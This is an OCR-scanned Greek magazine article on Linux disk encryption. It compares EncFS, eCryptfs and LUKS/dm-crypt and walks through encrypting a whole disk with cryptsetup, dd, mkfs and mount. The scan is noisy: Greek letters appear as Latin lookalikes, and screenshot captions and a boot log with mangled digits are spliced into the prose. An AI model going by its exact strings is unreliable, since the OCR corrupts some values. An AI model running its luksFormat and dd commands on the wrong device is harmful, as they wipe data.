ano ασφάλεια, ο συνδυασμός του LUKS µε το dm-crypt προσφέρει και τεράστια ευελιξία. 
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Applications Places eg Je 7 Di A ® panos varelas 


pvar@dhvnet~-debian: ~ 


File Edit Vie ch Terminal Help 


σα] pvar@dhvnet-debian 


Με τη βοήθεια του cryptsetup μπορούμε να εφαρμόσουμε το πρὀτυπο 
κρυπτογράφησης LUKS πάνω o' ἑναν ολόκληρο δίσκο. Πα την κρυ- 
πτογράφηση των δεδοµένων δημιουργείται TO λεγόμενο master key 
το οποίο αποθηκεύεται μέσα στο LUKS header, στην αρχή του δίσκου. 
Το master key κρυπτογραφείται και προστατεύεται µε Eva passphrase 
που ορίζουμε -KAI γνωρίζουµε- εμείς. 


συγκεκριμένο σύστημα αρχείων δεν ενσωματώθηκε NOTE στον πυρήνα του Linux και 
παρέχεται ano ἑνα πρὀγραμμα που εκτελείται στο λεγόμενο user Space. Ακριβώς γι 
αυτό, η χρήση του EncFS προὐποθέτει την παρουσία ενὸς ακόµα προγράμματος nou 
επιτρέπει σε "απλὲς εφαρμογές" -σε προγράµµατα που εκτελούνται απὀ τον EKAOTO- 
τε χρήστη- να λειτουργούν σαν drivers για συστήματα αρχείων. Αναφερόµαστε στο 
FUSE (Filesystem in USErspace), το οποίο εἶναι πολύ πιθανό να γνωρίζετε, καθὼς 
αποτελεί το απαραίτητο υπόβαθρο για διάφορα συστήματα αρχείων, εξωτικἁ και µη 
(SSHFS, GMailFS, NTFS-3G κ.λπ.). Η ανάπτυξη του EncFS ξεκίνησε περὶ το 2003 κι 
εκεἰνη την εποχἠ ἦταν πρωτοπὀρο στο χώρο. Σήμερα, ωστόσο, δεν θα μπορούσαμε 
να πούμε ὁτι ισχύει κάτι τέτοιο. H λειτουργία του βασίζεται σε ορισμένες ιδέες που 
µε την πάροδο του χρόνου αποδείχθηκαν προβληματικές. Στηρϊζεται, για παράδειγ- 
μα, στο λεγόμενο security by obscurity, ενώ εισάγει κι ορισμένες πρωτότυπες τε- 
XVIKEG κρυπτογράφησης τη στιγμή που η απομάκρυνση ano τις παραδοσιακές (και 
δοκιμασμένες) μεθόδους αποτελεἰ επικίνδυνη τακτικἠ στο χώρο της κρυπτογραφίας. 
Αποφασίσαμε, λοιπὸν, να µην ασχοληθούμε περισσότερο μαζὶ του. Εξάλλου, µια 
πρόσφατη ἐρευνα ἐφερε στο φως πολλὲς ευπάθειες κι ανέδειξε την ανάγκη για μια 
εκ βάθρων αναβάθμιση του προγράµµατος. Μπορείτε να δείτε τα αποτελέσµατα της 
σχετικἠς έρευνας στο http://sourceforge.net/p/encfs/mailman/message/31849549, 
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Στο παρὀν άρθρο θα εξετάσουμε δύο ἄλλες λύσεις που αμφότερες προσφέρουν evi- 
σχυμένη και δοκιμασμένη ασφάλεια. Μάλιστα, οι σχετικοί μηχανισμοί στηρἰζονται 
στον πυρήνα Tou Linux κι αυτό συνεπάγεται αυξημένες επιδόσεις σε σχέση µε το 
EncFS ἡ µε οποιαδήποτε ἄλλη λύση που στηρἰζεται στο FUSE. Θα μιλήσουμε λοιπόν 
για το eCryptfs, καθὼς και για το πακέτο του dm-crypt µε το LUKS. Μη νομίζετε 
ότι τα συγκεκριµένα προγράμματα αποτελούν SIGMOPETIKEG υλοποιήσεις του ἰδιου 
πράγματος. Παρουσιάζουν θεμελιώδεις διαφορές μεταξὺ τους και το καθένα ἐχει τα 
δικά του πλεονεκτήματα. Στη συνέχεια θα αναφερθούμε συνοπτικἁ στους δύο µηχα- 
νισμοὺς και στον τρόπο που επιτυγχάνουν την κρυπτογραφημένη αποθήκευση των 
δεδομένων. Σημειώστε ὁτι αυτή η θεωρητικὴ εισαγωγἠ εἶναι ιδιαίτερα χρήσιμη, αν 
όχι απαραΐτητη, για την κατανόηση των βημάτων που θα περιγράψουμε αργότερα. 


Κρυπτογραφημένες συσκευές 


To LUKS (Linux Unified Key Setup) αποτελεἰ τμήμα του πυρήνα του Linux και δεν ei- 
ναι τίποτα ἄλλο ano Eva Ἐπρότυποξ για την κρυπτογράφηση των αποθηκευτικὠν μὲ- 
σων και τη διαχείριση των σχετικών κλειδιών. Το ἴδιο το LUKS δεν μπορεὶ να κρυπτο- 
γραφήσει κανένα αποθηκευτικὀ μέσο απὀ μόνο του. Αυτή η λειτουργία προσφέρεται 
ano ἑνα υποσύστημα του πυρήνα που ονομάζεται dm-crypt. Το εν λόγω υποσύστημα 


Applications Places eg Thu Dec 25, 4:44 PM en A ΒΦ panos varelas 


pvar@dhvnet-debian: ~ 


arch Terminal Help 


dhvnet-debian: 


Πα την πρόσβαση σε ἑναν δίσκο που ἐχει κρυπτογραφηθεί µε TO 
LUKS, πρέπει πρώτα να δημιουργήσουμε Eva ειδικὀ block device. 
Αυτό επιτυγχάνεται µε τη βοήθεια του cryptsetup και της παραμὲ- 
τρου luksOpen. Αφού δημιουργήσουμε To block device, μπορούμε 
να στραφούµε πάλι στο cryptsetup και να αντλήσουµε διάφορες 
nAnpo@opies για το εἶδος της κρυπτογράφησης και το μέγεθος 
του αποθηκευτικού μέσου. 
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μπορεί να αξιοποιεί οποιαδήποτε μέθοδο κρυπτογράφησης ενσωματώνει ο πυρήνας, 
ενὠ µπορεἰ να κρυπτογραφεἰ ολόκληρους δίσκους ἡ και μεμονωμένες κατατμήσεις 
(διαμερίσματα). Το πιο ενδιαφἐρον χαρακτηριστικὀ του, ὅμως, απορρέει απὀ το y£- 
γονὸς OT! ανήκει σε Eva ευρύτερο υποσύστημα του πυρήνα και συγκεκριµένα στον 
device mapper. Αναρωτιὲστε τι σημασία ἐχει αυτὸ και γιατὶ μπορεὶ να μὰς ενδια- 
φέρει; Όταν κρυπτογραφούμε Eva αποθηκευτικὀ µέσο µε το dm-crypt, ο πυρήνας 
βλέπει ξαφνικὰ µια νέα συσκευἠ τύπου block (block device), η οποία κρυπτογραφεἰ 
αυτόματα ὁλα τα δεδοµένα που προσπαθούμε να γράψουμε πάνω της. Φανταστείτε 
ἑνα σκληρὀ δίσκο που ενσωματώνει hardware για την αυτόματη κρυπτογράφηση κι 
αποκρυπτογράφηση των αποθηκευμένων δεδομένων. Ε, λοιπὸν, κάπως ETO! αντι- 
λαμβάνεται ο πυρήνας τα block devices που δημιουργεὶ το dm-crypt. Σε µια τέτοια 
συσκευἠ μπορούμε να εφαρμόσουμε οποιοδήποτε σύστημα αρχείων θέλουμε (EXT3, 
JFS, XFS, ReizerFS κ.λπ.). Εδὠ όμως υπάρχει µια ἀκρως ενδιαφέρουσα λεπτομέρεια: 
Τα ονόματα των αρχείων, τα δικαιώματα πρὀσβασης και γενικότερα όλα τα metadata 
που αποθηκεύει το εκάστοτε σύστημα αρχείων, θα εἶναι επίσης κρυπτογραφημένα! 
Με ἄλλα λόγια, θα εἶναι αδύνατο για κἄποιον να καταλάβει ποιο file system ἐχουμε 
χρησιμοποιήσει ἡ να εξάγει την παραμικρὴ πληροφορία για τα αποθηκευμένα αρχεία. 
Τέλος, σημειώστε ὁτι οι συσκευὲς που δημιουργεί το dm-crypt μπορούν να ενσω- 
ματωθούν πανεύκολα σε συγκροτήματα αποθηκευτικὠν μέσων (volume groups) του 
LVM (Logical Volume Manager) ἡ να αποτελέσουν το υπόβαθρο για τη δημιουργία 


Devices «. & Home ta Q Search 


J Floppy Drive z = k 3 


Computer Desktop Documents Downloads 
Home 


Documents 


Downloads Enter a password to unlock the volume 
Music 


Pictures 


The device "2.1 GB Hard Disk" contains encrypted data. 
Videos Password: 

8] File System 
5 Trash 


Forget password immediately 
® Remember password until you Logout 
Network Remember forever 


Browse Network 
Cancel Connect 


To LUKS εἶναι ενσωματωμένο στον πυρήνα Tou Linux εδώ και 
πολλά χρόνια. Έτσι, η υποστήριξή του ano τις διάφορες εφαρ- 
μογές εἶναι ευρύτατη. O file manager Tou GNOME, ας πούμε, 
εντοπίζει αυτόματα τις συσκευές που έχουν κρυπτογραφηθεί µε 
το LUKS και επιτρἐπει την EUKOAN προσάρτησή τους ano περι- 
βάλλον γραφικών. 


42 


Κρυπτογραφημένα αποβηκευτικά μέσα 
Αα 


τέτοιων συγκροτημάτων. Αν όλα αυτά σὰς εἶναι ἄγνωστα ἡ εντελὠς αδιάφορα, δεν 
υπάρχει λόγος ανησυχίας. Ta block devices που δημιουργεί το dm-crypt μπορούν va 
χρησιμοποιηθούν και σαν απλὲς κατατμήσεις. Ὅπως αντιλαμβάνεστε, ο συνδυασμὸς 
LUKS και dm-crypt προσφέρει τεράστια ασφάλεια και εξίσου µεγάλη ευελιξία. 


Επίπεδο κρυπτογράφησης 


To eCryptfs (Enterprise Cryptographic Filesystem) εἶναι κάτι πολύ διαφορετικὀ ano 
όσα ἐχουμε δει ως τώρα. Δεν αποτελεἰ OUTE τυπικὀ σύστημα αρχείων, οὐτε driver 
που εκτελείται στο "περιβάλλον" του χρήστη, οὐτε κάποιον μηχανισμό για τη δημι- 
ουργία κρυπτογραφημένων block devices. To eCryptfs εἶναι Eva stacked filesystem. 
Πα va κατανοήσετε τι σημαίνει aUTO, πρέπει να πούμε δυο λόγια για τη διάρθρω- 
ση του σχετικού τμήματος του πυρήνα. O κὠδικας που αφορά στο χειρισμό των 
filesystem χωρίζεται σε δύο κύριες περιοχές: H μία έχει τη γενικἠ ονομασία native 
filesystem kal περιλαμβάνει τον κὠδικα που υλοποιεί καθένα and τα συστήµατα ap- 
χείων (EXT3, JFS, XFS, ReizerFS κ.λπ.). H ἄλλη περιοχὴ εἶναι περισσότερο γνωστή 
σαν VFS (ano το virtual filesystem) και αποτελεὶ Evav μηχανισμό που επιτρέπει το 
χειρισμό όλων των filesystems µε ενιαἰο τρόπο. Όταν ξεκινά ο πυρήνας, καθένα ano 


Applications Places eg 


pvar@dhvnet-debian: ~ 


File Edit View Search Terminal Help 


) dhvnet-debian: 
Μέσα στο crypttab μπορούμε να περιγράψουμε τις κρυπτογρα- 
φημένες OUOKEUEG µε δύο τρόπους: Δίνοντας το device file ἡ το 
αντίστοιχο UUID. Πα να πληροφορηθούμε το UUID ενός δίσκου 
μπορούμε να χρησιμοποιήσουμε το προγραμματάκι Isblk, δίνοντάς 
του μεταξύ ἄλλων και την παράμετρο uuid. Σημειώστε ότι στο 
crypttab δεν πρέπει να εισάγουµε το UUID του block device nou 
δημιουργεί το dm-crypt, αλλά εκείνο της "Φυσικής" συσκευής. 
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Loading, please wait... 
. 8568131 sd 2:6:1:6: [sda] Assuming drive cache: write through 
«9972381 sd 2:6:1:86: [sda] Assuming drive cache: write through 
«99726761 x >:B: [sdb] Assuming drive cache: write through 
.8579421 sd 2: [sdb] Assuming drive cache: write through 
. 858214] : [sdb] Assuming drive cache: write through 

[ 2.931457] - 16:14:86: [sda] Assuming drive cache: write through 

INIT: version 2.88 booting 

Using makefile-style concurrent boot in runlevel 5. 

Starting the hotplug events dispatcher: udevd. 

Synthesizing the initial hotplug events...done. 

Waiting for “dev to be fully populated...[ 4.641194] piix4_smbus 88606:66:07.3 

Host SMBus controller not enabled? 

done. 

Setting preliminary keymap...done. 

Setting parameters of disc: (none) 

Activating swap...done. 

Checking root file system...fsck from util-linux 2.28.1 

/dev/sdai: clean, 7136/85344 files, 188588/348992 blocks 

done. 

Starting early crypto disks...vault (starting)... 

Unlocking the disk “dev/disk/by-uuid/5db487ae-d356-4c59-85c4-2976fe441885 (vault 


Αφού ρυθµἰίσαµε κατάλληλα το crypttab κι ενημερώσαμε TO 
initramfs, πραγματοποιήσαµμε µια επανεκκίνηση. Όπως βλέπετε, TO 
boot διακόπηκε πολύ σύντομα και TO σύστημα ζήτησε TO απαραίτητο 
passphrase yia την πρὀσβαση στον κρυπτογραφημένο δίσκο. 


τα εγκατεστημένα filesystems ενημερώνει το VFS για τις λειτουργίες που προσφέρει 
και τη διεύθυνση των αντίστοιχων συναρτήσεων/µεθόδων. Ἔτσι, οι εφαρμογές που 
εκτελούνται απὀ το AEITOUPYIKO σύστημα δεν χρειάζεται να γνωρίζουν τις Ιδιαιτε- 
ρότητες κάθε filesystem. Αρκεἰ να χρησιμοποιούν τα κατάλληλα system calls του 
λειτουργικού, τα οποία μεταφράζονται αυτόματα σε κλήσεις προς τις αντίστοιχες 
συναρτήσεις Tou filesystem. Όπως καταλαβαίνετε, αυτἠ η μετάφραση πραγµατοποι- 
εἶται στο επίπεδο του VFS. O κὠδικας του eCryptfs βρίσκεται ανάμεσα στις παραπἀ- 
væ δύο περιοχὲς και κάνει κάτι αρκετά πονηρό: Εμφανίζεται στο VFS ως Eva τυπικὀ 
filesystem, ενὼ στον κὠδικα των filesystems εμφανίζεται σαν To VFS! Με αυτόν τον 
τρόπο μπορεί να προσθέσει σε οποιοδἠποτε σύστημα αρχείων θέλουμε µια νέα ðu- 
νατότητα: Την κρυπτογράφηση των δεδομένων. Το eCryptfs, λοιπὸν, δεν εφαρµόζε- 
ται απευθείας πάνω στα διάφορα αποθηκευτικἁ µέσα. H λειτουργία του προὐποθέτει 
την ύπαρξη κάποιου ἄλλου filesystem, ενώ η κρυπτογράφηση δεν εφαρµόζεται στο 
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Όταν προσαρτούµε έναν κατάλογο µε τη βοήθεια Tou eCryptfs, καλού- 

μαστε να απαντήσουμε σε αρκετὲς ερωτήσεις. Το NEPIEXOLIEVO τους εἰναι 
αρκετά απλὀ και στις περισσότερες περιπτώσεις μπορούμε να πατάμε απλά 
[ENTER], προκειµένου να δίνουμε την προεπιλεγµένη απάντηση. 


σύνολο της διαθἑἐσιµης ἐκτασης, παρὰ μόνο μέσα σε συγκεκριμένους καταλόγους. 
Το γεγονὸς αυτό σημαίνει ὁτι το πλήθος των κρυπτογραφημένων αρχείων και τα 
σχετικά metadata (δικαιώματα πρὀσβασης, ημερομηνία τροποποἱησης, κ.λπ.) που 
διατηρεί το filesystem, δεν κρυπτογραφούνται και dpa δεν προφυλάσσονται. Βὲ- 
Bala, εξαιτίας αυτού του τρόπου λειτουργίας το eCryptfs διαθέτει και ορισμένα npo- 
σόντα: Οι κρυπτογραφημένοι φάκελοι δεν έχουν κανένα περιορισμὀ στο μέγεθος, 
ενὠ μπορούμε να τους μετακινούμε πανεύκολα σε οποιοδήποτε αποθηκευτικὀ μέσο 
του συστήματος. 


Καθολική κρυπτογράφηση 


H αλήθεια εἶναι ὁτι υπάρχουν πολλὲς ακόµα ζουμερὲς λεπτομέρειες που θα pno- 
ρούσαμε να ενσωματώσουμε στη θεωρητικἠ µας εισαγωγἠ. Πα την wpa, όμως, θα 
στραφούμε στην πράξη. Στην πορεία θα εμπλουτίσουμε το δεδομένο θεωρητικὀ 
υπόβαθρο, αλλά ταυτόχρονα θα διαπιστώσετε OT! τα πράγματα εἶναι πιο anAd απ' 
όσο δείχνουν εκ πρώτης. H παρουσἰασἠ µας θα ξεκινήσει µε το εξἠς σενάριο: Ας 
υποθέσουμε ὁτι θέλουμε να δημιουργήσουμε ἑναν ασφαλἠ αποθηκευτικὀ χώρο, 
εφαρμόζοντας Eva σύστημα κρυπτογράφησης σε Evav ολόκληρο δίσκο. Σε AUTÒ το 
δἰσκο θα τοποθετούμε αργότερα τα ευαἰσθητα δεδοµένα µας και θέλουμε να εἰμαστε 
σίγουροι ὁτι θα εγγράφονται σε κρυπτογραφηµένη μορφή. Ας υποθέσουμε επἰσης 
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ότι γι' αυτή τη δουλειά έχουμε επιλέξει το πανίσχυρο και ταχύτατο ζεύγος dm-crypt 
/ LUKS. Εμεὶς εργαστἠκαµε στο Debian 7 (Wheezy), αλλά η λογικἠ ὁσων ακολου- 
θοὺν παραμένει ἴδια σε κάθε διανομὴ Linux. 


Πριν ξεκινήσουμε αξίζει να αναφέρουμε OT! οι οδηγοἰ εγκατάστασης πολλῶν διανο- 
μών επιτρέπουν την κρυπτογράφηση ολόκληρου του δίσκου, αυτοματοποιώντας µια 
πολύ ενδιαφέρουσα διαδικασία. Εν ολίγοις, δημιουργούν µια απλἠ κατάτµηση (χωρίς 
κρυπτογράφηση) για την προσάρτηση του /boot και µία ακόµα, κρυπτογραφημένη 
µε τη βοήθεια του dm-crypt. H κρυπτογραφηµένη κατάτμηση αντιστοιχίζεται σε Eva 
volume group και μέσα σε αυτό δημιουργούνται ξεχωριστοίἰ τόμοι (logical volumes) 
µε To LVM. Τα logical volumes χρησιμοποιούνται για την προσάρτηση του χώρου 
αντιµετάθεσης, καθὼς καιτων επιµέρους καταλόγων του συστήµατος (Swap space, / 
usr, /var, /home κ.ο.κ.). Αν σας προβληματίζει το ylaTi επιλέχθηκε αυτή η περίπλοκη 
διευθέτηση, η απάντηση εἶναι αρκετά απλἠ: Ἐχοντας τοποθετήσει τα πάντα μέσα σε 
*éva* κρυπτογραφημένο block device, το λειτουργικὀὸ σύστημα ζητάει μόνο *Eva* 
password ano το χρήστη. Αν δημιουργούνταν ξεχωριστά κρυπτογραφημέἑνα block 
devices για κάθε τµήµα του συστήµατος, ο χρήστης θα έπρεπε να εισάγει πολλά 
συνθηματικἁ κατὰ To boot. Όπως αντιλαμβάνεστε, αν και το παραπάνω σενάριο 
παρουσιάζει ιδιαίτερο ενδιαφέρον, εἶναι αρκετά πολύπλοκο και δεν προσφέρεται για 
µια πρώτη γνωριμία µε τα εργαλεία που παρουσιάζουμε. Ας δούμε λοιπὀν Nac υλο- 
ποιεῖται το δικὸ µας σενάριο, σε τἐσσερα απλά βήματα. 


Βήμα 1ο. Κατ' αρχάς, αν ο δίσκος περιέχει ἠδη δεδοµένα τότε εἶναι απαραίτητο 
να τα μεταφέρουμε σε κάποια ἄλλη συσκευή. H διαδικασία, βλέπετε, ξεκινά µε τη 
διαμόρφωση (format) του δίσκου. Στα πρώτα δύο βήματα της διαδικασίας, τυχὸν 
υπάρχοντα δεδοµένα καταστρέφονται ολοκληρωτικἁ. Πα την αρχικἠ διαμόρφωση 
χρησιμοποιούμε το cryptsetup - To πρὀγραμµα που παρέχει πρὀσβαση στις λειτουρ- 
γίες του dm-crypt!: 


sudo cryptsetup luksFormat /dev/sdb 


Όπως βλέπετε, ο δίσκος που BEAGHE να κρυπτογραφἠσουµε εμεἰς αντιστοιχούσε στο 
device file /dev/sdb. Περιττὸ να πούμε OT! αυτό το βήμα χρειάζεται μεγάλη προσο- 
Xn, για να µην καταλήξετε να καταστρέψετε κάποιον άσχετο δίσκο κι ενδεχομένως 
ολόκληρο το σύστημα. Εκτελῶντας το cryptsetup µε τον τρὀπο που εἶδαμε, θα µας 
ζητηθεί το λεγόμενο passphrase - το συνθηματικὀ που θα απαιτεἰται αργότερα για 
την αποκρυπτογράφηση του δίσκου. Σε επόμενη ενότητα θα δούμε ὁτι μπορούμε 
να προσθέτουμε και να καταργούµε passphrases αυθαίρετα, χωρίς να δημιουργείται 
κάποιο μπέρδεμα µε τα κρυπτογραφημένα δεδομένα. Μήπως αυτή η δυνατότητα 
προκαλεί κάποια σύγχυση για τη φύση Tou passphrase; Ας ξεκαθαρἰσουµε λἰγο το 
Tonio, καθώς πρὀκειται για µια κρίσιμη ἔννοια στο "οικοσύστημα" του LUKS. 


Εκτελώντας το cryptsetup µε την παράμετρο luksFormat, το σύστημα δεν θα ασχο- 
ληθεἰ ιδιαίτερα µε Ta περιεχόμενα του δίσκου. Μη νομίζετε δηλαδὴ OT! θα πραγµατο- 
ποιηθεἰ κάποια σαρωτικἠ διαγραφὴ των αποθηκευμένων αρχείων. Το μόνο σίγουρο 
εἶναι ὁτι θα καταστραφεί To partition table και θα ισοπεδωθούν οι υπάρχουσες KATA- 
τμήσεις. Ano εκεἰ και πέρα, το σύστημα θα δημιουργήσει Eva LUKS header και θα To 
αποθηκεύσει στη αρχἠ του δίσκου. Σε αυτό το header αποθηκεύεται κάτι Napa πολύ 
σηµαντικὀ: Το κλειδὶ για την κρυπτογράφηση και την αποκρυπτογράφηση των δεδο- 
μένων του δίσκου (master key). Όπως καταλαβαίνετε, αυτό το κλειδὶ αποθηκεύεται 
επίσης σε κρυπτογραφημένη μορφή. Στην αντίθετη περίπτωση θα μπορούσε να το 


1. Θυμηθείτε ὁτι το dm-crypt δεν εἶναι εργαλείο, αλλά Eva ολόκληρο υποσύστημα του πυρήνα! 
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pvar@dhvnet~-debian: ~ 


File Edit V Search Terminal Help 


[σε] pvar@dhvnet-debian 
Βλέπετε τίποτα παράξενο; To eCryptfs µπορεί va προσαρτήσει Evav 
κατάλογο πάνω στον ἰδιο του τον εαυτό! 


διαβάσει οποιοσδήποτε και να αποκρυπτογραφἠσει τα πάντα µε άνεση. Το master 
key, λοιπὸν, αποθηκεύεται σε κρυπτογραφημένη μορφὴ και για να χρησιμοποιηθεί 
πρέπει πρὠτα να αποκρυπτογραφηθεἰ. Κάπως ETO! μπαίνει στο παιχνίδι το λεγόμενο 
passphrase. Πρὀκειται για ἑνα συνθηματικό που ορἰζουµε εμείς και το οποίο αποτε- 
Agi το κλειδί αποκρυπτογράφησης του master key! 


Βήμα 2ο. Με το προηγούμενο βήμα εξασφαλἰζουµε OT! ο δίσκος /dev/sdb μπορεί να 
φιλοξενήσει κρυπτογραφημένα δεδομένα, σύμφωνα µε το πρὀτυπο LUKS. Ωστόσο, 
κανενὸς εἶδους κρυπτογράφηση δεν ἐχει ξεκινήσει ακόμα! Ma να πετύχουμε κάτι 
τέτοιο, πρέπει να δημιουργήσουμε πρώτα Eva νἐο block device, το onoio θα αξιοποι- 
εἰ το εγκατεστημένο LUKS header. Αυτό επιτυγχάνεται και πάλι µε τη βοήθεια του 
cryptsetup: 


sudo cryptsetup luksOpen /dev/sdb vault 


Εκτελώντας το παραπάνω θα χρειαστεἰ να δώσουμε TO passphrase για την ano- 
κρυπτογράφηση του master key. Εφόσον το δώσουμε, θα δηµιουργηθεἰ Eva block 
device µε το ὀνομα vault, που θα βρίσκεται στη θέση /dev/mapper/vault. Δεν ξὲ- 
poupe αν το υποιμιάζεστε, αλλά αυτὸ το block device θα ἐχει την εγγενἠ ιδιότητα 
να κρυπτογραφεἰ οτιδήποτε του δίνουμε και να αποκρυπτογραφεἰ οτιδήποτε προ- 
σπαθούμε να διαβάσουμε. Με άλλα λόγια, οτιδήποτε γράφουμε στο /dev/mapper/ 
vault θα καταλήγει να γραφτεἰ στο /dev/sdb, αλλά σε κρυπτογραφηµένη µορφή. 
Αντίστοιχα, οτιδήποτε προσπαθούμε να διαβάσουμε ano το /dev/mapper/vault, θα 
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Όταν αποπροσαρτούµε Evav κατάλογο που ἐχει κρυπτογραφηθεί µε TO 
eCryptfs, Ta περιεχὀμενἁ του εμφανίζονται κάπως ἐτσι. Καθένα ano αυτά 
τα αρχεία παρουσιάζει πλήρη αυτοτέλεια: Μπορούμε va το μεταφέρουμε 
σε οποιονδήποτε υπολογιστή κι εφόσον γνωρίζουμε TO passphrase va το 
αποσυμπιέσουµε κανονικά. Πα Tov ἰδιο λόγο μπορούμε να διατηρούμε και 
incremental backups των κρυπτογραφηµένων αρχείων. 


λαμβάνεται ano το /dev/sdb και θα μὰς παρέχεται σε αποκρυπτογραφηµένη µορφή. 
Ἔτσι, ακόµα κι αν καταφέρει κανεὶς να κλέψει ολόκληρο το δίσκο, θα EXE! πάρει την 
κρυπτογραφημένη εκδοχἠ των δεδομένων µας. Πα την αποκρυπτογράφηση θα np_E- 
πει να γνωρίζει το passphrase. 


Πριν αρχίσουμε να χρησιμοποιήσουμε τη νέα συσκευἠ µε οποιονδήποτε τρόπο, πρέ- 
πει να τη γεµίσουµε µε τυχαία δεδομένα. Αναρωτιέστε γιατί; Αν ο δίσκος ἦταν ap- 
χικἁ κενὸς και παρὰ την κρυπτογράφηση των δεδομένων, θα υπάρχουν εμφανείς 
ενδείξεις της χρήσης που κάνουμε. Ακόμα και χωρίς TO passphrase, ἑνας κακόβου- 
λος χρήστης θα μπορεὶ να εκτιμήσει πανεύκολα την ἐκταση των αποθηκευμένων 
δεδομένων και να διαπιστώσει αν και κατὰ πόσο χρησιμοποιούμε το δίσκο. Αυτή 
η πληροφορἰα φαίνεται αδιάφορη, αλλά σε ορισμένες περιπτώσεις επιτρέπει την 
πραγματοποίηση κάποιων επιθέσεων στα κρυπτογραφημένα δεδομένα. Μιλάμε για 
πολὺ προχωρημένες επιθέσεις που πραγματοποιούνται και πολὺ δύσκολα. Ωστόσο, 
το μέτρο ασφάλειας που προτείνουμε εἶναι εξαιρετικἁ απλὀ και δεν υπάρχει καμία 
δικαιολογία για va το προσπεράσουµε. Το yèpiopa του νέου block device µε τυχαία 
δεδομένα µπορεἰ να πραγµατοποιηθεί ως εξἠς: 


sudo dd if=/dev/zero of=/dev/mapper/vault 
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Όχι, δεν πρὀκειται για τυπογραφικὀ λάθος! Μην νομίζετε OT! θέλαμε να χρησιµοποι- 
ἡσουμε σαν εἰσοδο το /dev/urandom και δώσαμε το /dev/zero ano απροσεξία. Εφὀ- 
σον το /dev/mapper/vault κρυπτογραφεὶ αυτόματα τα "εισερχόμενα" δεδομένα, δεν 
πρὀκειται να γραφτούν στο δίσκο σκέτα μηδενικά. Θα γραφτεί η κρυπτογραφημένη 
εκδοχἠ µιας αλληλουχίας μηδενικὠν, που θα ἐχει τη μορφή µιας σειράς τυχαίων 
χαρακτήρων ;) 


Όπως καταλαβαίνετε, το γέμισμα Evoc ολόκληρου δίσκου µε τυχαία δεδοµένα uno- 
pei να διαρκέσει αρκετἠ ὡρα. Π' αυτό το λόγο θα ἧταν χρήσιμο αν εἶχαμε µια ἐνδειξη 
της πορείας της διαδικασίας. Ένα πρὀγραμμα που µπορεί να βοηθήσει εδώ εἶναι το 
pv. Πρόκειται για va εργαλείο που παρακολουθεἰ τα δεδοµένα που μετακινούνται 
μέσω διασωλήνωσης και µπορεί να μετρήσει τον ὀγκο τους, το ρυθμὀ μεταφοράς 
κ.ά. Πα την εγκατἀστασἡ του στο Debian αρκεἰ να δώσουμε κάτι τέτοιο: 


sudo apt-get install pv 


Στη συνέχεια, για να πραγµατοποιήσουµε τη διαδικασία nou εἰδαμε νωρίτερα και va 
παρακολουθούμε ταυτόχρονα την πρὀοδο, αρκεἰ να δώσουμε κάτι τέτοιο: 


pv -rb /dev/zero | sudo dd of=/dev/mapper/vault 


Στο παρἀδειγμὰ µας εκτελούμε TO pv µε δύο παραμέτρους. H πρώτη (-r) εμφανίζει το 
ρυθμὸ μεταφορὰς των δεδομένων, ενώ η δεύτερη (-b) εμφανίζει το συνολικό πλήθος 
των bytes που έχουν μεταφερθεί. 


Βήμα 3ο. Σε αυτό το στάδιο μπορούμε να ξεκινήσουμε τη χρήση του /dev/mapper/ 
vault Kavovikd. Τι σηµαίνει αυτό, όμως; Αναφερόμαστε σε Eva block device, το οποίο 
δεν EXE! χρησιμοποιηθεί ποτὲ ξανὰ. Επομένως, αυτὸ που ἐχει σειρἁ τώρα εἶναι η 
διαμόρφωση µε κάποιο filesystem. Εμεἰς επιλέξαμε το EXT4 και δώσαμε κάτι τέτοιο: 


sudo mkfs.ext4 /dev/mapper/vault 


Φυσικά, EGEIG μπορείτε να χρησιμοποιήσετε οποιοδήποτε filesystem θέλετε. Για τον 
πυρήνα του συστήματος To /dev/mapper/vault αποτελεί Eva block device σαν όλα τα 
ἄλλα. Μπορείτε να το φορμάρετε ὁπως θέλετε, χωρίς κανέναν περιορισμό! 


Βήμα 4ο. Νομἰζουμε ὁτι τώρα ἐχει αρχίσει να ξεκαθαρίζει το πράγμα. Τι κάνουμε ou- 
νήθως μετὰ aNd τη διαμόρφωση ενὸς δίσκου ἡ µιας κατάτµησης; Προχωράµμε στην 
προσἀρτησή της (mount) σε κἄποιον κατάλογο. Εμείς, για να αποκτήσουμε πρόσβα- 
ση µε Evav "φυσιολογικὀ" τρόπο στον κρυπτογραφημένο µας δίσκο, επιλέξαμε να 
τον προσαρτήσουμµε στη θέση /mnt/vault. Πα το σκοπὀ αυτό δώσαμε τα εξής: 


sudo mkdir /mnt/vault 


sudo mount /dev/mapper/vault /mnt/vault 


Βασικἠ διαχείριση 


Αν και προσπαθἠσαµε να ρἰξουμε φως σε κάθε λεπτομέρεια της παραπάνω διαδι- 
κασίας, πρέπει να ομολογήσουμε OT! παραμένει κάπως περίπλοκη και δύστροπη. H 
όλη εργασὶα βασίζεται σε αφηρημένες έννοιες που εἶναι EUKOAO να προκαλέσουν 
σύγχυση σε όσους ασχολούνται για πρώτη φορὰ UE TO ζήτημα, EVW δεν συγχωρεί TO 
παραμικρὸ λάθος. O κίνδυνος της απώλειας δεδοµένων παραμονεύει σε αρκετἀ on- 
ueia. Το ευτύχημα εἶναι ὁτι εφόσον ακολουθήσουμε τα παραπάνω βήματα µια φορὰ, 
δεν θα χρειαστεί να τα επαναλάβουµε. Τουλάχιστον OX! τα επικἱνδυνα ;) Την επόμενη 
Φορά που θα επανεκκινήσουµε το σύστημα, για την πρὀσβαση στον κρυπτογραφη- 
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μὲνο δίσκο θα αρκούν δύο απλές κινήσεις. Κατ' αρχάς θα πρέπει να δημιουργήσουμε 
εκ νέου To block device που έχει την ιδιότητα της αυτόματης κρυπτογράφησης και 
αποκρυπτογράφησης. Αυτό γίνεται πανεύκολα δίνοντας κάτι τέτοιο: 


sudo cryptsetup luksOpen /dev/sdb enc_blk_dev 


Εφόσον δώσουμε TO passphrase και δημιουργηθεί To /dev/mapper/enc_blk_dev µε 
επιτυχία, αρκεἰ να το προσαρτἠήσουµε σε κἄποια θέση της επιλογἠ µας: 


sudo mount /dev/mapper/enc_blk_dev /mnt/encrypted-storage 


Όπως βλέπετε, η συγκεκριμένη διαδικασἰα εἶναι πολύ πιο απλἠ ano Ekeivn που aKo- 
λουθήσαμε κατὰ την αρχικἠ προετοιμασία του δίσκου. Ωστόσο, ἐχετε υπόψη σας ὅτι 
µπορεἰ και να αυτοματοποιηθεί πλήρως! Πριν δούμε πὠς NOPE! να επιτευχθεἰ κάτι 
